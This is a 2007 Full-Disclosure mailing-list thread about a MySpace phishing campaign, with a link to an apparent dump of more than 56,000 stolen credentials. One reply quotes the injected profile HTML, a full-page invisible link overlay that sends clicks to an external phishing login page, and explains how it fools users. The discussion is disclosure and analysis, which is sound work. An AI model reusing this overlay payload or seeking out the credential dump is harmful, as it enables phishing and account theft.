[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Grab a myspace credential
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Grab a myspace credential
- From: "K F (lists)" <kf_lists@xxxxxxxxxxxxxxxxxxx>
- Date: Tue, 16 Jan 2007 15:19:12 -0500
http://www.ninjahype.org/mov/
nameHREFTrack
-KF
wac wrote:
>
>
> On 1/16/07, *Deepan* <codeshepherd@xxxxxxxxx
> <mailto:codeshepherd@xxxxxxxxx>> wrote:
>
> On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote:
> > "but at some point all this abuse will likely start sending
> users off
> > to another service. "
> >
> > thats only --if the know if they are being abused.. most of them
> are
> > not coherent about any such issues..
> >
> >
> >
> > On 1/15/07, Kevin Pawloski <kpawloski@xxxxxxxxx
> <mailto:kpawloski@xxxxxxxxx>> wrote:
> > The level of phishing sites targeting MySpace and bot
> related
> It is not quiet easy to fool 56000+ users using phishing sites. I
> wonder
> how Mark is doing it.
>
>
>
> Hmm... Oh no is very easy, yes very easy what he is doing. He left
> some traces on some of the "cracked" accounts, I was expectig of
> somebody to comment earlier since I've been a couple of hours since
> the initial post.
>
> When you modify a profile you can add this to the data of the profile,
> you know those HTML customizations. I found this on one of the
> accounts that really got my attention a little bit more than the girl
> of the account :P
>
> HOLA!!!!<a style="text-decoration:none;position:
> absolute;top:1px;left:1px;" href="http://marcolano.com/login/";><img
> style="border-width:0px;width:2024px; height:1768px;"
> src="http://x.myspace.com/images/clear.gif";></a><a
> style="text-decoration:none;position: absolute;top:1px;left:1px;"
> href="http://marcolano.com/login/";><img
> style="border-width:0px;width:2024px; height:1768px;"
> src="http://x.myspace.com/images/clear.gif";></a><embed
> allowScriptAccess="never" allowNetworking="internal"
> enableJSURL="false" enableHREF="false" saveEmbedTags="true"
> src="http://www.../mov/cid_3277_f.mov"; width="1" height="1">
>
> As you might see, this creates a huge invisible link in the page in
> front of everything, so when you click into anything on the page like
> a link or anything it will take you to that phising website so ppl
> beleive that the account expired and enter their user+pass. Now I
> beleive that his message was a way to tell about a BUG in myspace that
> should filter that content and it is not doing it. So... we are in
> fact not talking about a stupid phishing website for those who still
> beleive that.
>
> Regards
> Waldo
>
>
> > activity that has been targeting MySpace lately is pretty
> > alarming. Granted there is no real financial risk if an
> > account gets compromised for the user but at some point all
> > this abuse will likely start sending users off to another
> > service.
> >
> > Kevin
> >
> >
> > On 1/15/07, North, Quinn <QNorth@xxxxxxx
> <mailto:QNorth@xxxxxxx>> wrote:
> > "youmustbecompleteretards@xxxxxxxxx
> :doyouhonestlythinkiwillputmyrealpass
> > wordhere"
> >
> > ...at least there is some hope left in the world :-\
> >
> > --=Q=--
> >
> > -----Original Message-----
> > From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
> <mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx>
> > [mailto:
> full-disclosure-bounces@xxxxxxxxxxxxxxxxx
> <mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx>] On
> > Behalf Of Emma
> > Perdue
> > Sent: Monday, January 15, 2007 7:48 AM
> > To: full-disclosure@xxxxxxxxxxxxxxxxx
> <mailto:full-disclosure@xxxxxxxxxxxxxxxxx>
> > Subject: [Full-disclosure] Grab a myspace credential
> >
> > 56000+ and counting
> >
> > http://www.marcolano.com/login/myspace.txt
> >
> > --
> > *Emma aka TINK*
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> >
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia -
> http://secunia.com/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> >
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia -
> http://secunia.com/
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> --
> -----------------------------------------------
> Regards
> Deepan Chakravarthy N
> http://www.codeshepherd.com/
> http://sudoku-solver.net/
>
> I am a programmer by day,
> I dig grave for other programmers by night.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> <http://secunia.com/>
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/